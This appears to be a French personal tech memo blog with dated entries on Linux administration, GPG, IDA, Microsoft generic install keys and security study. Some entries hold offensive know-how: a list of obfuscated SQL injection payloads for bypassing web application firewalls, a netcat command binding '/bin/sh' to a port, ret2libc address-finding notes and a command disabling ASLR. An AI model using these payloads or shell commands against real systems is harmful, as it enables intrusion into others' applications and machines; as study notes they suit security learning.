Outlook 2013 : QPN8Q-BJBTJ-334K3-93TGY-2PMBT
PowerPoint 2013 : 4NT99-8RJFH-Q2VDH-KYG2C-4RD4F
Publisher 2013 : PN2WF-29XG2-T9HJ7-JQPJR-FCXK4
InfoPath 2013 : DKT8B-N7VXH-D963P-Q4PHY-F8894
Lync 2013 : 2MG3G-3BNTT-3MFW9-KDQW3-TCK7R
Visio 2013 Professionnel : C2FG9-N6J68-H8BTJ-BW3QX-RM3B3
Visio 2013 Standard : J484Y-4NKBF-W2HMG-DBMJC-PGWR7


Clés d’installation des clients Office 2010 + Visio:
Visio Standard 2010 : 767HD-QGMWX-8QTDB-9G3R2-KHFGJ
Visio Professional 2010 : 7MCW8-VRQVK-G677T-PDJCM-Q8TCP
Visio Premium 2010 : D9DWC-HPYVV-JGF4P-BTWQB-WX8BJ
Office Professional Plus 2010 : VYBBJ-TRJPB-QFQRF-QFT4D-H3GVB
Office Standard 2010 : V7QKV-4XVVR-XYV4D-F7DFM-8R6BM
Office Home and Business 2010 : D6QFG-VBYP2-XQHM7-J97RH-WRCK
Access 2010 : V7Y44-9T38C-R2VJK-666HK-T7DDX
Excel 2010 : H62QG-HXVKF-PP4HP-66KMR-CW98M
Word 2010 : HVHB3-C6FV7-KQX9W-YQG79-CRY7T
SharePoint Workspace 2010 : QYYW6-QP4CB-MBV6G-HYMCJ-4T3J4
InfoPath 2010 : K96W8-67RPQ-62T9Y-J8FQJ-BT37T
OneNote 2010 : Q4Y4M-RHWJM-PY37F-MTKWH-D3XHX
Outlook 2010 : 7YDC2-CWM8M-RRTJC-8MDVC-X3DWQ
PowerPoint 2010 : RC8FX-88JRY-3PF7C-X8P67-P4VTT
Project Professional 2010 : YGX6F-PGV49-PGW3J-9BTGG-VHKC6
Project Standard 2010 : 4HP3K-88W3F-W2K3D-6677X-F9PGB
Publisher 2010 : BFK7F-9MYHM-V68C7-DRQ66-83YTP


Sources :
http://technet.microsoft.com/en-us/library/jj612867.aspx
http://technet.microsoft.com/fr-fr/library/jj612867.aspx
http://technet.microsoft.com/fr-fr/library/dn385360.aspx


LIEN:
http://www.cbouba.fr/cles-de-licences-generiques-microsoft-pour-installation/
http://www.cbouba.fr/cles-de-licences-generiques-microsoft-pour-installation/http://lecrabeinfo.net/telecharger-windows-10-en-version-finale-rtm-iso.html /

2015-10-05
VM windows Machine virtuelle Windows à la volée.
https://dev.modern.ie/tools/vms/linux/ /

2015-10-04
GPG Quelques commandes pour utiliser facilement GnuPG.

Générer une paire de clef RSA (associé à une adresse email):
$ gpg --gen-key

Ecrire et chiffrer à la volée, terminé par ctrl+d (EOF):
$ gpg -e -a -r toto@lol.pipo

Chiffrer un fichier existant :
$ cat myTextFile.txt | gpg -e -a -r toto@lol.pipo -o myCryptFile.gpg

Déchiffrer une fichier existant :
$ gpg --decrypt myCryptFile.gpg > myDecryptFile.txt

Supprimer une paire de clef :
$ gpg --list-key | grep -A1 -B1 toto
pub 4096R/C11D8A3E 2015-10-14
uid totopiou (toto)
sub 4096R/3E51A344 2015-10-14

$ gpg --delete-secret-key 3E51A344

$ gpg --delete-key C11D8A3E
/ gpg, chiffrement

2015-09-03
IDA debian $ wget http://sgnsl.free.fr/ftp/ida68.tgz
$ tar xvfz ida68.tgz
$ cd idademo68
# ./idaq
./idaq: error while loading shared libraries: libgthread-2.0.so.0: cannot open shared object file: No such file or directory

# ldd idaq | grep found
libstdc++.so.6 => not found
[...]

# dpkg --add-architecture i386
# apt-get update

# apt-get install libc6-i686:i386 libexpat1:i386 libffi6:i386 libfontconfig1:i386 libfreetype6:i386
# apt-get install libglib2.0-0:i386
# apt-get install libSM6:i386
# apt-get install libXrender1:i386
# apt-get install libXext6:i386
# apt-get install lib32stdc++6

$ mv idademo68 .idademo68
# ln -s /home/aql/.idademo68/idaq /usr/bin/idaq

$ idaq


$ ./idaq
OK ok ok
try this,
http://www.hexblog.com/?p=958
/ debugging reverse installation

2015-08-27
Services GNU/linux # apt-get install sysv-rc-conf

# sysv-rc-conf


Un tableau, on-ne-peut-plus-simple pour gerer tous les services.
/

2015-07-21
TTY chars Size Redimentionner les polices TTY

# apt-get install console-setup
# dpkg-reconfigure console-setup (tes réglages)


Je conseille la plus petite 8x13.
/ tty, police

2015-07-17
Keyboard Langue noXorg Pour changer la langue du clavier sans interface graphique :

# dpkg-reconfigure keyboard-configuration
# service keyboard-setup restart

Rappel : sous debian le clavier US est à Anglais (US) debian_keyboard_settings
/ clavier, langue

2015-06-27
Netcat WTF $> nc -l 1234 -c '/bin/sh'

Error ...
Whaaat ?

$> apt-cache search netcat
netcat-openbsd - « Couteau suisse » pour TCP/IP
cryptcat - A lightweight version netcat extended with twofish encryption
netrw - netcat like tool with nice features to transport files over network
corkscrew - tunnel pour connexions TCP à travers des mandataires HTTP
libexpect-perl - Expect.pm - interface Expect pour Perl
netcat - Couteau suisse pour TCPIP : paquet de transition
netcat-traditional - « Couteau suisse » pour TCP/IP
netcat6 - Couteau Suisse TCP/IP avec prise en charge de l'IPv6
netsed - network packet-altering stream editor
socat - relais polyvalent pour le transfert de données bidirectionnel


Linux Ubuntu 3.13.0-32-generic -> netcat-openbsd (pas d'option -c)

Linux debian 3.2.0-4-686-pae -> netcat-traditional
/ reseau

2015-06-22
Google oublie-moi
/

2015-06-21
Bip carte mere Bip de la carte mere en fin de ligne ou autre ?

# rmmod pcspkr

/ speaker, bip, chiant

2015-05-25
Memento_part_ret2lib $> ldd a./out
linux-vdso.so.1 => (0x00007fff78dc6000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f1dfe32b000)
/lib64/ld-linux-x86-64.so.2 (0x00007f1dfe709000)

$> ps -A | grep a.out
5733 pts/12 00:00:00 a.out

$> cat /proc/5733/maps
7f6649112000-7f66492cd000 r-xp 00000000 fc:01 296476 /lib/x86_64-linux-gnu/libc-2.19.so
7f66492cd000-7f66494cd000 ---p 001bb000 fc:01 296476 /lib/x86_64-linux-gnu/libc-2.19.so
7f66494cd000-7f66494d1000 r--p 001bb000 fc:01 296476 /lib/x86_64-linux-gnu/libc-2.19.so
7f66494d1000-7f66494d3000 rw-p 001bf000 fc:01 296476 /lib/x86_64-linux-gnu/libc-2.19.so
7f66494d3000-7f66494d8000 rw-p 00000000 00:00 0
7f66494d8000-7f66494fb000 r-xp 00000000 fc:01 296474 /lib/x86_64-linux-gnu/ld-2.19.so
7f66496df000-7f66496e2000 rw-p 00000000 00:00 0
7f66496f7000-7f66496fa000 rw-p 00000000 00:00 0
7f66496fa000-7f66496fb000 r--p 00022000 fc:01 296474 /lib/x86_64-linux-gnu/ld-2.19.so
7f66496fb000-7f66496fc000 rw-p 00023000 fc:01 296474 /lib/x86_64-linux-gnu/ld-2.19.so

$> locate libc-2.19.so
/lib/i386-linux-gnu/libc-2.19.so
/lib/x86_64-linux-gnu/libc-2.19.so
/usr/lib/debug/lib/x86_64-linux-gnu/libc-2.19.so

$> nm /usr/lib/debug/lib/x86_64-linux-gnu/libc-2.19.so | grep system
0000000000046170 t do_system
000000000012be50 t __GI_svcerr_systemerr
0000000000046640 T __libc_system
000000000012be50 T svcerr_systemerr
0000000000046640 W system


LIBC => 0x00007f1dfe32b000
SYSTEM => 0000000000046640
RES == 7f1dfe32b000 + 46640
PDF
http://repository.root-me.org/ / securite, crack

2015-04-30
Depot Debian JESSIE DEPOTS JESSIE !
Dans /etc/apt/sources.lst

deb http://ftp.fr.debian.org/debian/ jessie main non-free contrib
deb http://security.debian.org/ jessie/updates main contrib non-free
deb http://ftp.fr.debian.org/debian/ jessie-proposed-updates main contrib non-free
deb http://www.deb-multimedia.org jessie main non-free

# apt-get install deb-multimedia-keyring
/ Linux, debian, depot

2015-02-20
Hardware CPU/GPU Calcul d'alimentation PC
Compatibilité CPU Carte mère
Comparatif GPU
http://processormatch.intel.com/http://www.anandtech.com/bench/product/512?vs=539 / hardware, comparatif

2015-02-18
Couleurs sur terminal En C,

# define RED "\e[1;31m"
# define GREEN "\e[1;32m"
# define YELLOW "\e[1;33m"
# define BLUE "\e[1;34m"
# define MAGENTA "\e[1;35m"
# define CYAN "\e[1;36m"
# define WHITE "\e[1;37m"
# define RESET "\e[1;0m"

printf ("%sTOTO%s\n",RED, RESET);
ft_putstr(YELLOW);
ft_putstr("SUPER TOTO\n");
ft_putstr(RESET);

Makefile ou directement en sh

GREY = "\033[30m"
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BLUE = "\033[34m"
PURPLE = "\033[35m"
CYAN = "\033[36m"
WHITE = "\033[37m"
ENDCOLOR = "\033[0m"


Si on crack a 200%, mais c'est tellement pratique pour le debug :

# define PS    ft_putstr
# define PC    ft_putchar
# define PN    ft_putnbr
# define CR    ft_putchar('\n');
# define PI    ft_putchar('[');
# define PO    ft_putchar(']');
# define YA    PS(RED);ft_putstr("YA ");PS(RESET);
# define LOL    PS(RED);ft_putstr("LOL\n");PS(RESET);
# define PSR(S)    PS(RED); PS(S); PS(RESET);
# define PSY(S)    PS(YELLOW); PS(S); PS(RESET);


$ echo -e "\033[31m LOL \033[0m"
LOL

Makefile :
@echo $(CYAN)"Hello world"$(ENDCOLOR)
Hello world
/ terminal, prompt, couleur

2015-02-17
Firefox profil Créer un autre profil sur firefox peut s’avérer utile.
Sous linux la manip part d'ici :
$ firefox -ProfileManager -no-remote

Laissez vous ensuite guider. Après avoir créer plusieurs profils vous aurez le choix de lancer la fenêtre du Gestionnaire de Profil à chaque démarrage ou non. Si vous sélectionnez non, il faudra lancé votre (vos) autre(s) profil(s) de la façon suivante. $ firefox -p $toto --no-remote

/ firefox, privée

2015-02-17
Changer adresse mac # ifconfig wlan0 hw ether 00:11:22:33:44:55
Logiquement vous aurez une erreur du type : SIOCSIFHWADDR: Périphérique ou ressource occupé - you may need to down the interface
Le périphérique est occupé (en cours d'utilisation).
On règle le problème en désactivant le périphérique le temps de la configuration, puis on le réactive.

# ifconfig wlan0 down && ifconfig wlan0 hw ether 00:11:22:33:44:55 && ifconfig wlan0 up
/ ifconfig, linux, reseau

2015-02-15
VIM What we need for vim,


set mouse=
set nu
sy on
set tabstop=4
set shiftwidth=4
set hlsearch
set ignorecase
set autoindent
set background=dark
vim_42_Zaz / vim, éditeur, linux

2014-01-02
Assembleur Introduction à l'assembleur
Utilisation de GDB, objdump, Ollydbg
ASM by Deamon
pdfASM
MemoAsm
intro au Cracking

En vrac,
Desactivation de l'ASLR
#> echo 0 > /proc/sys/kernel/randomize_va_space

http://www.grappa.univ-lille3.fr/~ppreux/Documents/assembleur-i8086.pdfhttp://www.linux-france.org/article/memo/node119.htmlhttp://www.xylibox.com/2011/09/archive-introduction-au-cracking-sous.htmlhttp://bases-hacking.org / Assembleur, re, asm

2014-01-01
Reconnaissance de HASH
http://h4ck-it.blogspot.fr / hash

2014-01-01
Metasploit Problème de database sur Metasploit
# msfconsole
Après une install de Kali (ex-backtrack) msfconsole offre un alert du type, "Database not connected or [...] using slow search"
Oui, pour commencer il faudrait la créer cette base de donnée !
Lien, sauf pour le démarrage auto de la db.
fedoraproject.org / metasploit, database,

2014-01-01
XFCE La couleur de fond du texte, des icones, de l'environnement graphique XFCE est pourrie !
Ajouter le fichier suivant dans le home de votre utilisateur gtkrc-2.0 en le renommant .gtkrc-2.0.
Ex: /home/toto/.gtkrc-2.0
Puis, on kill/relance l'interface graphique.(attention à vos projets en cours d'édition)
# killall Xorg

Ici ca marche bien aussi
http://slackalaxy.wordpress.com/2012/08/15/xfce-transparent-desktop-icons-text-background/

gtkrc-2.0

/ linux, env graphique

2014-01-01
Bypass WAF http://sgnsl.free.fr/ftp/PT-devteev-CC-WAF-ENG.pdf

1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11.id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12.id=1+un/**/ion+sel/**/ect+1,2,3--
13.id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3 14.id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

/ injection, sql

2013-11-29
Monter iso de plusieurs partitions C'est la seule astuce que j'ai trouvé, un peu bisard la 1ere fois, mais finalement très logique..
_ICI
jbnet.fr / linux, partition, iso

2013-08-01
Adressage automatique d'interface Dans /etc/network/interfaces

auto eth0:1
# le :1 permet de faire un alias d'interface reseau
iface eth0:1 inet static address 192.168.20.1 network 192.168.20.0 netmask 255.255.255.0 broadcast 192.168.20.255 dns-nameservers 192.168.20.1
/ linux, interphace, debian

2013-03-26
42 Une nouvelle école d'informatique voit le jour,
elle est entièrement financé par Xavier Niel (le PDG de l'opérateur FREE).
L'école est gratuite et promet un niveau Master en 3 ans.

ecole-informatique-revolutionnaire inscritpion le Programe en PDF

http://www.42.fr/http://www.42.fr/wp-content/uploads/2013/03/programme-42.pdf / Informatique

2013-01-13
Syslog sur tty Journal syslog sur terminaux TTY.
# vim /etc/rsyslog.conf
/ tty, syslog

2013-01-06
Tentative de Fishing Pour ceux que ca interesse, voici les tentatives de fishing que j'ai reçu par e-mail.
Ca peut être quelques-chose d'interessant à étudier...
Attention quand même de ne pas balancer le lien directement sur votre navigateur sans prendre quelques précautions !

On remarque que le CMS Wordpress est vraiment l'une des 1ères cibles sur le net.
Au passage, un petit lien concernant la recherche de versions WP.

Encore au passage une faille sur le wordpress 2.8.3 (reinitialisation du mot de passe).
http://www.boiteaweb.fr/cacher-sa-version-de-wordpress-est-inutile-3415.htmlhttp://korben.info//se-proteger-du-hack-wordpress-2-8-3-qui-reinitialise-le-mot-de-passe.htmlsgnsl.free.fr, http://www.boiteaweb.fr, http://korben.info / fishing, wordpress

2013-01-01
Privilege Escalation Aborder une escalade de privilèges,
` Privilege Escalation '
Basic linux privilege escalation
http://blog.g0tmi1k.com / privilege escalation

2013-01-01
Injection SQL L'un des meilleurs sites francophones,
Base Hacking
Base Hacking Avancées

http://bases-hacking.org/injections-sql-avancees.htmlhttp://bases-hacking.org / injection, sql

2013-01-01
Magics Commandes Convertion HEXA - ASCII
$ cat hexaFichier | perl -ne 's/(..)/print(chr(hex($1)))/ge' > asciiFichier.txt

Recursive wget
$ wget -mkEpnp http://example.org

-m mirror
-k convert-links
-E adjust extention
-p page-requisites
-np no-parent

Sed keep only number
$ sed 's/[^0-9]*//g'


Read lines from a file and execute something
while read myFileLine; do echo $myFileLine; done < dico.txt

Enhanced version of dd for forensics and security
dd => dcfldd
/ Magics Commandes

2012-12-12
Partage de connexion internet /forwarding Entre server et client :
server - connecté en wifi et connecté en cable RJ45 à client
client - connecté en cable RJ45 à server sans connection internet

Ces commandes doivent etre lancé en tant que root
________________________________________

Server :
On donne une adresse ip et un masque a l'interface qui va recuperer internet sur le wifi soit eth0
# ifconfig eth0 192.168.20.10
Client :
// Pareille pour le client
# ifconfig eth0 192.168.20.11
Nous avons maintenant un reseau local entre les 2 machines.
Server :
// Activer le forwarding.
# echo 1 > /proc/sys/net/ipv4/ip_forward # iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -j MASQUERADE
Client :
// on ajoute une route pour notre client
// on ajoute le dns de google (pas toujours besoin)
# route add default gw 192.168.20.10 # echo 'nameserver 8.8.8.8' > /etc/resolv.conf
Client :
// un petit ping pour etre sur que tout va bien
$ ping 8.8.8.8 $ ping google.fr
/ forwarding, partage, internet

2012-10-25
GreHack 2012 Suite au vendredi 19 octobre dernier, je fourni les quelques pdf offert dans une clef usb.
De bonnes conférences en continues entre 8h30 et 18h30 (en anglais à 90%).
Un bon CTF avec des challenges de qualités et dans divers domaines (stegano,
crypto, forencsis, web ...)
Dommage, il n'y avait pas d'accès internet.
grehack.org / grehack, ctf, conference

0000-00-00
Signature de fichiers http://www.garykessler.net/library/file_sigs.html
www.garykessler.net / magic number